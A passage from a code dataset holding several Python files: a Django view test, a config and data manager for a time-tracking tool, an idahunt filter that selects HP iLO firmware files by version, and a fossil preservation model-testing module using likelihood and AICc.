self.client.post(self.urlBase+'remove/'+str(self.modelRow.id)+'/',{})\r\n            totalUpdated = self.modelStandard.objects.count()\r\n            \r\n            self.assertEquals(response.status_code, 200)\r\n            self.assertTrue(totalBefore > totalUpdated)","repo_name":"jairvercosa/onyxlog","sub_path":"onyxlog/core/base/core_base_test.py","file_name":"core_base_test.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"40636634368","text":"import csv\nimport json\nimport os\nimport os.path\nfrom datetime import timedelta\nimport pprint\n\nfrom date_point import DatePoint, Timeframe\n\nclass DataManager:\n    \"\"\"Wraps the mechanism for persisting and querying work dates and times\n\n    The main features of this program rely on storage of dates and times during\n    which personal project work has taken place. The actual mechanism for\n    storing this data is abstracted from the rest of the program. 
Here it is\n a simple `csv` file, with 'frozen' DatePoints stored in it.\n \"\"\"\n def __init__(self, config, path, data_file):\n self.data_filepath = os.path.join(path, data_file)\n self.config = config\n self._date_list = None\n self._file_modified = True\n\n @classmethod\n def default(cls):\n \"\"\"Return the default init arguments to be passed in by Config\"\"\"\n return {'data_file': 'data.csv'}\n\n @classmethod\n def setup(cls, path, data_file, **kwargs):\n \"\"\"Perform the necessary initial setup for the data\n\n Currently just makes the data file (a csv)\n \"\"\"\n data_filepath = os.path.join(path, data_file)\n if not os.path.isfile(data_filepath):\n with open(data_filepath, 'w'):\n pass\n\n def add_date(self, date):\n \"\"\"Append a new DatePoint to the date list\"\"\"\n with open(self.data_filepath, 'a', newline='') as writef:\n writer = csv.writer(writef)\n writer.writerow([date.freeze()])\n self._file_modified = True\n\n @property\n def date_list(self):\n \"\"\"Get the list of DatePoints this manager stores\"\"\"\n if self._date_list is None or self._file_modified:\n with open(self.data_filepath, 'r', newline='') as reader:\n reader = csv.reader(reader)\n self._date_list = [DatePoint.unfreeze(date[0]) for date in reader]\n self._file_modified = False\n return self._date_list\n\n def save(self):\n \"\"\"Persist any data that may have changed during runtime\n\n Since `add_data` is the only mutating method and it persists the data,\n this doesn't need to do anything (as of yet).\n \"\"\"\n pass\n\nclass CacheManager:\n \"\"\"Manager for cached data, i.e. calculated/temporary data\n\n Not used extensively in `Project`, however will become more relevant as\n more extensive statistics/information is made available.\n \"\"\"\n def __init__(self, config, cache_filename, path):\n \"\"\"Create a new cache manager from the filepath\"\"\"\n self.config = config\n self.cache_path = os.path.join(path, cache_filename)\n self._cache = None\n\n @property\n def cache(self):\n \"\"\"Lazy loading of the cache data\"\"\"\n if self._cache is None:\n with open(self.cache_path, 'r') as cache_file:\n self._cache = json.load(cache_file)\n return self._cache\n\n @classmethod\n def default(cls):\n \"\"\"Return the default init arguments to be passed in by Config\"\"\"\n return {'cache_filename': 'cache.json'}\n\n @classmethod\n def setup(cls, path, cache_filename, **kwargs):\n \"\"\"Perform the necessary initial setup for the data\n\n Makes the cache file and initializes the used values to None\n \"\"\"\n cache_filepath = os.path.join(path, cache_filename)\n if not os.path.isfile(cache_filepath):\n with open(cache_filepath, 'w') as cache_file:\n json.dump({'start_time': None}, cache_file)\n\n @property\n def start_time(self):\n \"\"\"Get the start time of the current timerange (if it exists)\"\"\"\n start_time = self.cache.get('start_time')\n if start_time is not None:\n return DatePoint.unfreeze(start_time)\n\n @start_time.setter\n def start_time(self, value):\n \"\"\"Set the start time for a new timerange\"\"\"\n if value is not None:\n value = value.freeze()\n self.cache['start_time'] = value\n\n def save(self):\n \"\"\"Persist any data that may have changed during runtime\"\"\"\n if self._cache is not None:\n with open(self.cache_path, 'w') as cache_file:\n json.dump(self._cache, cache_file)\n\nclass ConfigLocations:\n \"\"\"Enum for the different types of places config can be stored\"\"\"\n config = 'config' # global config, i.e. 
in ~/.config\n local = 'local' # local to a specific directory, so /some/path/.project\n env = 'env' # a specific global location given by an environment variable\n\n\nclass ConfigManager:\n \"\"\"Manager for the configuration of this project\n\n Abstraction for a persistent configuration. Saves the filepaths of the\n other necessary files as well. Currently the 'bootstrap' point, i.e. a path\n to this file is necessary to find or create the rest of the data. This will\n later be used to store more user-specific config as functionality is\n expanded.\n \"\"\"\n\n # directory name to use when making a config dir inside the current dir\n LOCAL_DIRNAME = '.project'\n # environment variable to check for a user-specified config location\n ENVIRONMENT_OVERRIDE = 'PROJECT_TRACKER_HOME'\n # directory name for a \"global\" config in a single location\n GLOBAL_DIRNAME = 'project'\n # config directory to put the global config into (currently ~/.config)\n DEFAULT_GLOBAL_LOCATION = os.path.expanduser('~/.config')\n # full path for a global config folder\n GLOBAL_DIRPATH = os.path.join(DEFAULT_GLOBAL_LOCATION, GLOBAL_DIRNAME)\n # directory to keep the cache in\n CACHE_DIRNAME = 'cache'\n # directory to keep the data in\n DATA_DIRNAME = 'data'\n # filename for the actual config file\n CONFIG_FILENAME = 'project.config'\n\n def __init__(self, data_config, cache_config, timeframe=None,\n finished_threshold=None):\n \"\"\"Create a new config manager, checking all the default locations\n\n This uses the `_config_location` class method to try to find an\n existing config location. If no such location exists, or if the data\n there is unreadable, raises an error. Otherwise also initializes the\n data and cache with the init data they store into config (on setup\n or during normal running).\n \"\"\"\n self.config_dirpath, self.location_type = self._config_location()\n self.config_filepath = self._config_filepath()\n if timeframe is None:\n timeframe = Timeframe.day\n self.timeframe = timeframe\n if finished_threshold is None:\n finished_threshold = timedelta(hours=1)\n self.finished_threshold = finished_threshold\n self._data_config = data_config\n self._cache_config = cache_config\n self.data = DataManager(self, **data_config)\n self.cache = CacheManager(self, **cache_config)\n\n @classmethod\n def to_dict(cls, data_config=None, cache_config=None, timeframe=None,\n threshold=None):\n config_dict = {}\n if data_config is not None:\n config_dict['data'] = data_config\n if cache_config is not None:\n config_dict['cache'] = cache_config\n if timeframe is not None:\n config_dict['timeframe'] = timeframe\n if threshold is not None:\n config_dict['finished_threshold'] = threshold\n return config_dict\n\n @classmethod\n def default(cls):\n return {\n 'timeframe': Timeframe.day,\n 'finished_threshold': 3600\n }\n\n def freeze(self):\n return self.to_dict(self._data_config,\n self._cache_config,\n self.timeframe,\n self.finished_threshold.total_seconds())\n\n @classmethod\n def unfreeze(cls, frozen):\n \"\"\"Initialize from a frozen dict\"\"\"\n timeframe = frozen.get('timeframe')\n finished_threshold = frozen.get('finished_threshold')\n if finished_threshold is not None:\n finished_threshold = timedelta(seconds=finished_threshold)\n # if there's no data or cache config an error has occurred\n data_config = frozen['data']\n cache_config = frozen['cache']\n return cls(data_config,\n cache_config,\n timeframe,\n finished_threshold)\n\n @classmethod\n def from_file(cls):\n dirpath = cls._config_location()\n filepath = 
cls._config_filepath()\n        try:\n            with open(filepath, 'r') as config_file:\n                result = json.load(config_file)\n            if result is None:\n                raise ValueError('Invalid config')\n            return result\n        except json.decoder.JSONDecodeError:\n            raise ValueError('Invalid config')\n\n    @classmethod\n    def find_config(cls):\n        config = cls.from_file()\n        return cls.unfreeze(config)\n\n    @classmethod\n    def save_dict(cls, config_dict):\n        filepath = cls._config_filepath()\n        with open(filepath, 'r') as config_file:\n            contents_dict = json.load(config_file)\n        if contents_dict != config_dict:\n            print('WARNING: overwriting changed data!')\n            print('Pre-overwrite file state:')\n            pprint.pprint(contents_dict)\n            print('Overwriting with:')\n            pprint.pprint(config_dict)\n        with open(filepath, 'w') as config_file:\n            json.dump(config_dict, config_file)\n\n    @classmethod\n    def merge_config(cls, config_dict):\n        with open(cls._config_filepath(), 'r') as config_file:\n            old_config = json.load(config_file)\n        old_config.update(config_dict)\n        cls.save_dict(old_config)\n\n    def save(self):\n        self.save_dict(self.freeze())\n        self.data.save()\n        self.cache.save()\n\n    @classmethod\n    def configure(cls, data_config=None, cache_config=None,\n                  timeframe=None, threshold=None):\n        config_dict = cls.to_dict(data_config, cache_config, timeframe, threshold)\n        if not os.path.isfile(cls._config_filepath()):\n            with open(cls._config_filepath(), 'w') as config_file:\n                json.dump(config_dict, config_file)\n        else:\n            cls.merge_config(config_dict)\n\n    @classmethod\n    def _find_local(cls):\n        current_dir = os.path.expanduser(os.getcwd())\n        local_dir = os.path.join(current_dir, cls.LOCAL_DIRNAME)\n        if os.path.isdir(local_dir):\n            return os.path.realpath(local_dir)\n        else:\n            while (not os.path.isdir(local_dir) and\n                   current_dir != os.path.dirname(current_dir)):\n                current_dir = os.path.dirname(current_dir)\n                local_dir = os.path.join(current_dir, cls.LOCAL_DIRNAME)\n            if os.path.isdir(local_dir):\n                return os.path.realpath(local_dir)\n\n    @classmethod\n    def _find_global(cls):\n        if os.path.isdir(cls.GLOBAL_DIRPATH):\n            return os.path.realpath(cls.GLOBAL_DIRPATH)\n\n    @classmethod\n    def _find_env(cls):\n        path = os.environ.get(cls.ENVIRONMENT_OVERRIDE)\n        if path is not None and os.path.isdir(path):\n            return os.path.realpath(path)\n\n    @classmethod\n    def _config_location(cls):\n        \"\"\"Check and return possible config locations in preference order\n\n        Tries the local, then the default global, then the environment-variable\n        set config locations. 
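(Concretely: a '.project' directory found by walking up from the current\n        directory, then ~/.config/project, then the directory named by the\n        PROJECT_TRACKER_HOME environment variable.) 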
If none are found raises an error.\n        \"\"\"\n        local = cls._find_local()\n        if local is not None:\n            return local, ConfigLocations.local\n        global_path = cls._find_global()\n        if global_path is not None:\n            return global_path, ConfigLocations.config\n        env = cls._find_env()\n        if env is not None:\n            return env, ConfigLocations.env\n        raise FileNotFoundError(\"Can't find config files\")\n\n    @classmethod\n    def _config_dirpath(cls):\n        return cls._config_location()[0]\n\n    @classmethod\n    def _config_location_type(cls):\n        return cls._config_location()[1]\n\n    @classmethod\n    def _config_filepath(cls):\n        return os.path.join(cls._config_dirpath(), cls.CONFIG_FILENAME)\n\n    @classmethod\n    def validate(cls, config_location):\n        \"\"\"Check that a config location was correctly set up\n\n        Not currently in use, needs slightly more thought and implementations\n        in Cache and Data.\n        \"\"\"\n        if not os.path.isdir(config_location):\n            return False\n        config_path = os.path.join(config_location, cls.CONFIG_FILENAME)\n        if not os.path.isfile(config_path):\n            return False\n        cache_dir = os.path.join(config_location, cls.CACHE_DIRNAME)\n        if not os.path.isdir(cache_dir):\n            return False\n        if not CacheManager.validate(cache_dir):\n            return False\n        data_path = os.path.join(config_location, cls.DATA_DIRNAME)\n        if not os.path.isdir(data_path):\n            return False\n        if not DataManager.validate(data_path):\n            return False\n        return True\n\n    @classmethod\n    def create_config_location(cls, config_location_type,\n                               make_intermediate=True, dir_path=None):\n        \"\"\"Make the directory required for certain config locations\"\"\"\n        makedir = os.makedirs if make_intermediate else os.mkdir\n        if config_location_type == ConfigLocations.local:\n            makedir(os.path.join(dir_path or os.getcwd(), cls.LOCAL_DIRNAME))\n        elif config_location_type == ConfigLocations.env:\n            if dir_path is not None:\n                makedir(dir_path)\n            else:\n                raise ValueError('Must give dir_path for env config type')\n        elif config_location_type == ConfigLocations.config:\n            makedir(cls.GLOBAL_DIRPATH)\n\n    @classmethod\n    def setup(cls, config_location_type=None, filepath=None):\n        \"\"\"Set up the file structures required to run from scratch\n\n        Can be given a type of config location to set up. Does not\n        currently overwrite existing files. Not overwriting may cause\n        some issues, as proper validation is not yet done so this could\n        leave incomplete structures untouched. However it prevents data\n        loss until more complete validation is completed.\n\n        This ensures a 'config location' based on the argument exists.\n        Then inside it, it creates a file structure consisting of a\n        config file, a cache folder, and a data folder. Data and Cache\n        setups are called on their respective folders. The default\n        initialization arguments for Data and Cache are stored in the\n        config file. 
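(With the default Data and Cache arguments this yields\n        <config dir>/project.config, <config dir>/data/data.csv and\n        <config dir>/cache/cache.json.) 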
These arguments are meant to potentially be\n modified by Data and Cache as needed and effectively act as a\n \"data store\" for them.\n \"\"\"\n if config_location_type is None:\n config_location_type = ConfigLocations.config\n try:\n config_dir = cls._config_dirpath()\n if cls._config_location_type() != config_location_type:\n raise FileNotFoundError()\n except FileNotFoundError:\n cls.create_config_location(config_location_type, dir_path=filepath)\n config_dir = cls._config_dirpath()\n config_filepath = cls._config_filepath()\n if os.path.isfile(config_filepath):\n try:\n with open(config_filepath, 'r') as config_file:\n config = json.load(config_file)\n data_init = config['data']\n cache_init = config['cache']\n except (json.decoder.JSONDecodeError, KeyError):\n print('Invalid config found. Not overwriting.')\n return\n else:\n data_init = DataManager.default()\n cache_init = CacheManager.default()\n data_path = os.path.join(config_dir, cls.DATA_DIRNAME)\n cache_path = os.path.join(config_dir, cls.CACHE_DIRNAME)\n if not os.path.isdir(cache_path):\n os.mkdir(cache_path)\n if not os.path.isdir(data_path):\n os.mkdir(data_path)\n cache_init['path'] = cache_path\n data_init['path'] = data_path\n\n cls.configure(data_init, cache_init)\n DataManager.setup(**data_init)\n CacheManager.setup(**cache_init)\n","repo_name":"spruceb/strk","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":16317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30042039716","text":"#!/usr/bin/python3\r\n#\r\n# This file is part of idahunt.\r\n# Copyright (c) 2018, Aaron Adams <aaron.adams(at)nccgroup(dot)trust>\r\n# Copyright (c) 2018, Cedric Halbronn <cedric.halbronn(at)nccgroup(dot)trust>\r\n#\r\n# Filter for HP iLO servers to be used by idahunt.py command line:\r\n# e.g. 
idahunt.py --filter \"filters/hpilo.py -m 244 -M 250 -i 4 -I 4 -v -n .webserv.elf.text\"\r\n\r\nimport argparse\r\nimport os\r\nimport re\r\nimport sys\r\nimport subprocess\r\nimport time\r\n\r\ndef logmsg(s, end=None, debug=True):\r\n    if not debug:\r\n        return\r\n    if type(s) == str:\r\n        if end != None:\r\n            print(\"[hpilo] \" + s),\r\n        else:\r\n            print(\"[hpilo] \" + s)\r\n    else:\r\n        print(s)\r\n\r\n# parse the version from the firmware name\r\n# examples: ilo4_250.bin\r\ndef build_version(dirname):\r\n    match = re.search(r'ilo([^\\\\/.]+)_([^\\\\/.]+)\\.bin', dirname)\r\n    if not match:\r\n        logmsg(\"Could not find the iloXXX.bin in string: %s\" % dirname)\r\n        return '', ''\r\n\r\n    ilo_version = match.group(1)\r\n    release_version = match.group(2)\r\n    return ilo_version, release_version\r\n\r\n# do we actually treat it?\r\ndef filter(f, min_ilo, max_ilo, min, max, name, verbose):\r\n    # Check hardcoded whitelist as a sanity check\r\n    # We expect something like \".webserv.elf.text\"\r\n    if \".text\" not in os.path.basename(f) and \".RO\" not in os.path.basename(f):\r\n        #logmsg(\"Skipping unrecognized file: %s\" % os.path.basename(f))\r\n        return None\r\n    # Check user-specified whitelist\r\n    if name and name != os.path.basename(f):\r\n        logmsg(\"Skipping wrong filename: %s\" % f, debug=verbose)\r\n        return None\r\n    ilo_version, release_version = build_version(f)\r\n    if ilo_version == None or len(ilo_version) == 0 or release_version == None or len(release_version) == 0:\r\n        return None\r\n    if max != None and release_version > max:\r\n        logmsg(\"Skipping release version too high: %s\" % f, debug=verbose)\r\n        return None\r\n    if min != None and release_version < min:\r\n        logmsg(\"Skipping release version too low: %s\" % f, debug=verbose)\r\n        return None\r\n    if max_ilo != None and ilo_version > max_ilo:\r\n        logmsg(\"Skipping iLO version too high: %s\" % f, debug=verbose)\r\n        return None\r\n    if min_ilo != None and ilo_version < min_ilo:\r\n        logmsg(\"Skipping iLO version too low: %s\" % f, debug=verbose)\r\n        return None\r\n\r\n    # all iLOs are 32-bit ARM atm\r\n    arch_ = 32\r\n    return f, arch_\r\n\r\ndef main(f, cmdline):\r\n    # We override sys.argv so argparse can parse our arguments :)\r\n    sys.argv = cmdline.split()\r\n\r\n    parser = argparse.ArgumentParser(prog=cmdline)\r\n    parser.add_argument('-i', dest='minimum_ilo', default=None, help='Minimum \\\r\n        iLO version to include in the analysis (eg: 4 for iLO4)')\r\n    parser.add_argument('-I', dest='maximum_ilo', default=None, help='Maximum \\\r\n        iLO version to include in the analysis (eg: 5 for iLO 5)')\r\n    parser.add_argument('-m', dest='minimum', default=None, help='Minimum \\\r\n        version to include in the analysis \\\r\n        (eg: 244 for ilo4_244.bin)')\r\n    parser.add_argument('-M', dest='maximum', default=None, help='Maximum \\\r\n        version to include in the analysis (eg: 250 for ilo4_250.bin)')\r\n    parser.add_argument('-n', dest='name', default=None, help='Restrict to \\\r\n        a given name (eg: .webserv.elf.text)')\r\n    parser.add_argument('-v', dest='verbose', default=False, action='store_true'\r\n        , help='be more verbose to debug script')\r\n    args = parser.parse_args()\r\n\r\n    return filter(f, args.minimum_ilo, args.maximum_ilo, args.minimum, args.maximum, args.name,\r\n        args.verbose)\r\n","repo_name":"nccgroup/idahunt","sub_path":"filters/hpilo.py","file_name":"hpilo.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":324,"dataset":"github-code","pt":"57"} +{"seq_id":"35461066374","text":"#!/usr/bin/env python 
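# Maximum-likelihood comparison of HPP, NHPP and TPP preservation models via AICc.\n# Minimal usage sketch (assuming Xdata is a list of per-lineage arrays of fossil\n# occurrence ages; the shift times below are example values only):\n#   run_model_testing(Xdata, q_shift=[23.03, 5.33], min_n_fossils=2)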
\nfrom numpy import *\nimport numpy as np\nimport scipy.stats\nnp.set_printoptions(suppress=True) # prints floats, no scientific notation\nnp.set_printoptions(precision=3) # rounds all array elements to 3rd digit\nfrom scipy.special import beta as f_beta\nfrom scipy.optimize import fmin_powell as Fopt # fmin\nfrom scipy.special import betainc\nimport csv,os, argparse,sys\n\n\ndef NHPP_lik(x,q,s,e):\n k=len(x[x>0]) # no. fossils for species i\n xB1= -(x-s) # distance fossil-ts\n c=.5\n C=s-c*(s-e)\n a = 1+ (4*(C-e))/(s-e)\n b = 1+ (4*(-C+s))/(s-e)\n lik = -q*(s-e) + np.sum(logPERT4_density(s,e,a,b,x)+np.log(q)) - np.log(1-np.exp(-q*(s-e)))\n #lik = -q*(s-e) + sum(logPERT4_density(s,e,a,b,x)+log(q))+log(s-e) - log(1-exp(-q*(s-e)))\n lik += -np.sum(np.log(np.arange(1,k+1)))\n return lik\n\ndef logPERT4_density(s,e,a,b,x): # relative 'stretched' LOG-PERT density: PERT4 * (s-e)\n #return log((s-x)**(b-1) * (-e+x)**(a-1)) - log ((s-e)**4 * f_beta(a,b))\n return np.log(s-x)*(b-1) + np.log(-e+x)*(a-1) - (np.log(s-e)*4 + np.log(f_beta(a,b)))\n\n### ML OPT SE\ndef optim_se_given_q_HPP(x,q,exp_se=0):\n # USE EXPECTED s,e: \n if exp_se==1:\n s,e =np.max(x)+1./q,np.min(x)-1./q\n else:\n s,e =np.max(x),np.min(x)\n if e<0: e= 0.00000001\n k=len(x[x>0]) # no. fossils for species i\n lik= -q*(s-e) + np.log(q)*k - np.sum(np.log(np.arange(1,k+1))) - np.log(1-np.exp(-q*(s-e)))\n return [lik,s,e]\n\ndef optim_se_given_q_NHPP(x,q): \n def NHPP_lik_ML(se):\n s=np.abs(se[0])+np.max(x)\n e=np.maximum(np.min(x)-np.abs(se[1]), 0.0001) # avoid extinction in the future\n k=len(x[x>0]) # no. fossils for species i\n c=.5\n C=s-c*(s-e)\n a = 1+ (4*(C-e))/(s-e)\n b = 1+ (4*(-C+s))/(s-e)\n lik1 = -q*(s-e) \n lik2 = np.sum(logPERT4_density(s,e,a,b,x)+np.log(q))\n lik3 = - np.log(1-np.exp(-q*(s-e)))\n lik = lik1+lik2+lik3 -np.sum(np.log(np.arange(1,k+1)))\n return -lik \n se0 = [0.1*np.max(x), np.min(x)-0.1]\n optValues =Fopt(NHPP_lik_ML, se0, full_output=1, disp=0)\n params=np.abs(np.array(optValues[0]))\n lik= -(optValues[1])\n s = params[0]+max(x)\n e = np.min(x)-params[1]\n return [lik,s,e]\n\ndef exp_tpp(q,q_shift): # expected value under a multi-Exp distributio\n q_shift=np.sort(list(q_shift)+[0,np.inf])\n pdf_sample = []\n tot_samples = 10000\n for i in range(len(q)):\n r = np.random.exponential(1./q[i],tot_samples)\n temp= r[r<(q_shift[i+1]-q_shift[i])]\n #print q_shift[i+1]-q_shift[i]\n pdf_sample += list(temp+q_shift[i])\n tot_samples -= len(temp)\n return np.mean(pdf_sample)\n\ndef optim_se_given_q_TPP(x,q,occs_sp_bin_i,times_q_shift=[np.inf,0],exp_se=0):\n fa,la=np.max(x),np.min(x)\n # USE EXPECTED s,e\n if exp_se==1:\n # speciation time\n qS_ts = times_q_shift[times_q_shift>=fa]\n if len(qS_ts)==1: # no shift prior to max(x)\n s = fa + 1./q[0]\n else:\n q_rates_prior_fa = q[0:(len(qS_ts))]\n #print \"q_rates_prior_fa\",q_rates_prior_fa[::-1], (qS_ts-fa)[::-1]\n s = fa + exp_tpp(q_rates_prior_fa[::-1], (qS_ts-fa)[::-1])\n # extinction time\n qS_te = times_q_shift[times_q_shift<=la]\n if len(qS_te)==1: # no shift prior to max(x)\n e = la - 1./q[len(q)-1]\n else:\n q_rates_post_la = q[len(q)-len(qS_te):len(q)]\n #print \"q_rates_post_la\",q_rates_post_la,la-qS_te\n e = la - exp_tpp(q_rates_post_la,la-qS_te)\n else:\n s,e =fa,la\n if e<0: e= 0.00000001\n k=len(x[x>0]) # no. fossils for species i \n k_vec = occs_sp_bin_i # no. occurrences per time bin per species\n # e.g. 
k_vec = [0,0,1,12.,3,0]\n h = np.histogram(np.array([s,e]),bins=np.sort(times_q_shift))[0][::-1]\n ind_tste= (h).nonzero()[0]\n #print \"\\n\\n\\nHIST\",ind_tste, np.array([s,e]),sort(times_q_shift)\n #print k_vec\n #quit()\n ind_min=np.min(ind_tste)\n ind_max=np.max(ind_tste)\n ind=np.arange(len(times_q_shift))\n ind = ind[ind_min:(ind_max+1)] # indexes of time frames where lineage is present\n # calc time lived in each time frame\n t = times_q_shift[times_q_shift<s]\n t = t[t>e]\n t2 = np.array([s]+list(t)+[e])\n d = np.abs(np.diff(t2))\n \n q_rates=q\n \n lik = np.sum(-q_rates[ind]*d + np.log(q_rates[ind])*k_vec[ind]) - np.log(1-np.exp(np.sum(-q_rates[ind]*d))) -np.sum(np.log(np.arange(1,np.sum(k_vec)+1))) \n #print [lik,s,e,max(x),min(x)]\n #print lik,s,e, x, i\n #quit()\n return [lik,s,e]\n\ndef range01(x, m=0, r=1):\n temp = (x-np.min(x))/(np.max(x)-np.min(x))\n temp = temp*r\n temp = temp+m\n return temp\n\ndef est_s_e_q(fossil_complete,occs_sp_bin,model=0,exp_se=0,q_shift_times=[],q0_init=[]):\n def calc_tot_lik_given_q(q_arg):\n q=np.abs(q_arg[0])\n ml_est = []\n i=0\n for x in fossil_complete: # loop over species\n if model==0:\n ml_est.append(optim_se_given_q_HPP(x,q,exp_se))\n elif model==1:\n ml_est.append(optim_se_given_q_NHPP(x,q))\n elif model==2:\n ml_est.append(optim_se_given_q_TPP(x,np.abs(np.array(q_arg)),occs_sp_bin[i],q_shift_times,exp_se))\n i+=1\n ml_est = np.array(ml_est)\n tot_lik = np.sum(ml_est[:,0])\n return -tot_lik\n \n q0 = [1.1]\n if model==2: \n if len(q0_init)> 0: q0 =q0_init\n else: q0= np.ones(len(q_shift_times)-1)\n #print q0\n optValues =Fopt(calc_tot_lik_given_q, q0, full_output=1, disp=0)\n try:\n if len(optValues[0]):\n params=np.abs(np.array(optValues[0]))\n except:\n params = np.abs(np.array([optValues[0]]))\n lik= - optValues[1]\n return [lik, params]\n\ndef calcAICc(lik,df,s):\n AIC = 2*df-2*lik \n den = (s - df -1)\n if np.min(den) <= 0:\n print(\"Using AIC as AICc won't allow for n. 
parameters > sample size\")\n return AIC, 0\n else:\n return AIC + (2 * df**2 + 2*df) / den, 1\n\ndef run_model_testing(Xdata,q_shift=0,min_n_fossils=2,verbose=1):\n # data are shifted by 100\n fossil_complete=[Xdata[i]+0 for i in range(len(Xdata)) if np.min(Xdata[i])>0 and len(Xdata[i])>=min_n_fossils] # remove extant, and few occs\n fossil_complete=[fossil_complete[i] for i in range(len(fossil_complete)) if np.max(fossil_complete[i])-np.min(fossil_complete[i])>0.1] # remove too short branches\n \n if len(fossil_complete) > 1:\n print(\"Using\",len(fossil_complete),\"species for model testing\")\n else:\n sys.exit(\"The number of lineages meeting the requirements for model testing is insufficient.\")\n \n max_time_range_fossils = np.max([np.max(i) for i in fossil_complete])\n min_time_range_fossils = np.min([np.min(i) for i in fossil_complete])\n \n if q_shift==0: \n q_shift = [min_time_range_fossils+ (max_time_range_fossils-min_time_range_fossils)/2.]\n else: \n q_shift = np.array(q_shift)+0\n \n times_q_shift = np.sort(np.array(list(q_shift)+ [ np.maximum(np.max(q_shift),max_time_range_fossils)*10 ] +[0]))[::-1]\n # print(times_q_shift) #, [min_time_range_fossils+ (max_time_range_fossils-min_time_range_fossils)/2.]\n #print np.ones(len(times_q_shift)-1)\n\n occs_sp_bin =list()\n for i in range(len(fossil_complete)):\n occs_temp = fossil_complete[i]\n h = np.histogram(occs_temp[occs_temp>0],bins=np.sort( times_q_shift ))[0][::-1]\n occs_sp_bin.append(h) \n # optimize rate\n # resHPP = est_s_e_q(fossil_complete,occs_sp_bin,model=0,exp_se=0)\n # if verbose ==1: print \"HPP max likelihood:\", resHPP[0], \"q rate:\", abs(resHPP[1])\n resHPPm = est_s_e_q(fossil_complete,occs_sp_bin,model=0,exp_se=1)\n if verbose ==1: print(\"HPP* max likelihood:\", np.round(resHPPm[0],2), \"q rate:\", np.abs(resHPPm[1]))\n # resTPP = est_s_e_q(fossil_complete,occs_sp_bin,model=2,q_shift_times=times_q_shift,exp_se=0)\n # if verbose ==1: print \"TPP max likelihood:\", resTPP[0],\"q rates:\", abs(np.array(resTPP[1]))\n resTPPm = est_s_e_q(fossil_complete,occs_sp_bin,model=2,q_shift_times=times_q_shift,exp_se=1)\n if verbose ==1: print(\"TPP* max likelihood:\", np.round(resTPPm[0],2),\"q rates:\", np.abs(np.array(resTPPm[1])))\n resNHPP = est_s_e_q(fossil_complete,occs_sp_bin,model=1)\n #if verbose ==1: print \"NHPP max likelihood:\", resNHPP[0],\"q rate:\", abs(resNHPP[1])\n \n # ADD SAMPLING OF TS (NHPP)\n def update_multiplier_proposal(i,d=1.2):\n u = np.random.uniform(0,1)\n l = 2*np.log(d)\n m = np.exp(l*(u-.5))\n ii = i * m\n return ii, np.sum(np.log(m))\n\n def get_TSTEvalues(x,q=0.5,n=1000):\n min_te = np.min(x)\n addteA = 0.05*min_te\n max_ts = np.max(x)\n addtsA = 0.05*max_ts\n teAvector = []\n tsAvector = []\n postA = -np.inf\n hast=0\n for it in range(n):\n addte=0.\n addte, hast1 = update_multiplier_proposal(addteA,d=1.2)\n addts=0.\n addts, hast2 = update_multiplier_proposal(addtsA,d=1.2)\n hast = hast1+hast2\n lik = NHPP_lik(x,q,(max_ts+addts),(min_te-addte)) \n r = np.log(np.random.random())\n if lik - postA +hast >= r and (min_te-addte)>0: # only accept if te > 0\n #print lik,hast, postA, r\n postA=lik + 0\n addteA=addte + 0\n addtsA=addts + 0\n if it % 10==0 and it>100:\n #print it, postA,lik, s, min_te-addteA,q,addte\n teAvector.append(min_te-addteA)\n tsAvector.append(max_ts+addtsA)\n return [np.mean(tsAvector),np.mean(teAvector)]\n\n liknhpp_Exp =0\n mean_rate = np.abs(resNHPP[1])\n for i in range(len(fossil_complete)):\n x = fossil_complete[i]\n #est_s = 
optim_se_given_q_NHPP(x,resNHPP[1])[1]\n [ts,te] = get_TSTEvalues(x,q=mean_rate,n=10000)\n liknhpp_Exp += NHPP_lik(x,mean_rate,ts,te)\n try: # compatibility with older numpy/scipy versions\n if len(liknhpp_Exp):\n liknhpp_Exp = liknhpp_Exp[0]\n except:\n pass\n if verbose ==1: print(\"NHPP* max likelihood:\", np.round(liknhpp_Exp,2),\"q rate:\",mean_rate,\"\\n\")\n \n # get AICc scores\n Liks = np.array([resHPPm[0],liknhpp_Exp,resTPPm[0]])\n DFs = np.array([1, 1, len(resTPPm[1])])\n d_size = np.array([len(fossil_complete)]*3)\n AICs, state = calcAICc(Liks,DFs,d_size)\n models = np.array([\"HPP\",\"NHPP\",\"TPP\"])\n best_model = models[AICs==np.min(AICs)]\n other_models = models[models != best_model]\n print(\"models:\", models)\n if state == 1:\n print(\"AICc scores:\", AICs)\n else: \n print(\"AIC scores:\", AICs)\n deltaAICs = AICs-np.min(AICs)\n deltaAICs_ = deltaAICs[deltaAICs>0]\n # empirical thresholds\n dAIC_hpp = [ [0,6.4,0],[0,17.4,0] ]\n dAIC_nhpp = [ [3.8,0,0],[8.,0,2.4] ]\n dAIC_tpp = [ [3.2,6.8,0],[10.6,23.3,0]]\n \n sig = [\"\",\"\"]\n if best_model==\"HPP\":\n if deltaAICs[1] > dAIC_hpp[1][1]: sig = [\"***\", \"***\"] # significance at 1% vs NHPP and TPP\n elif deltaAICs[1] > dAIC_hpp[0][1]: sig = [\"*\", \"***\"]\n else: sig = [\"\",\"***\"]\n if best_model==\"NHPP\":\n if deltaAICs[0] > dAIC_nhpp[1][0]: sig = [\"***\", \"***\"] # significance at 1% vs HPP and TPP\n elif deltaAICs[0] > dAIC_nhpp[0][0]: sig = [\"*\", \"***\"]\n else: sig = [\"\",\"***\"]\n if best_model==\"TPP\":\n if deltaAICs[0] > dAIC_tpp[1][0]: sig = [\"***\"] # significance at 1% vs HPP \n elif deltaAICs[0] > dAIC_tpp[0][0]: sig = [\"*\"]\n \n if deltaAICs[1] > dAIC_tpp[1][1]: sig += [\"***\"] # significance at 1% vs NHPP\n elif deltaAICs[1] > dAIC_tpp[0][1]: sig += [\"*\"]\n \n print(\"\"\"\n --------------------------------------\n Best model: %s\n \n dAIC - %s: %s %s\n dAIC - %s: %s %s\n \n *** indicates significance at P < 0.01\n * indicates significance at P < 0.05\n --------------------------------------\n \"\"\" % (best_model[0], other_models[0], np.round(deltaAICs_[0],3), sig[0], \\\n other_models[1], np.round(deltaAICs_[1],3), sig[1] ))\n \n print(\n \"\"\"\\nTesting the significance of each shift in 